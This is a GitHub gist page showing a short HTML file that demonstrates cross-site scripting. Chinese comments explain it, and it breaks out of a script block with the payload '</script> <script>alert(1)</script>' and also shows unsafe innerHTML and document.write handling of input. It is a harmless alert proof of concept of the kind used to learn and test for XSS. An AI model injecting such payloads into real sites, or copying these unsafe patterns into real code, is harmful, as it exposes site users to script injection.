Skip to content

Instantly share code, notes, and snippets.

@FernandoZhuang
Created June 14, 2018 06:21

Revisions

  1. FernandoZhuang created this gist Jun 14, 2018.
    16 changes: 16 additions & 0 deletions XssJs过滤引号弹框.html
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,16 @@
    <!--Vulnerbility注入点: 输入的是2333"alert(1)
    <label><h4 id="twoH4">
    <script type="text/javascript">
    var two = document.getElementById('twoH4');
    var two_value = "2333alert(1)";
    two.innerHTML=two_value;
    </script>
    </h4></label>
    -->
    <!--Inject输入: </script> <script>alert(1)</script>-->
    <label><h4>
    <script type="text/javascript">
    var you = 'iloveyou';
    document.write('</script> <script>alert(1)</script>'+','+you);
    </script>
    </h4></label>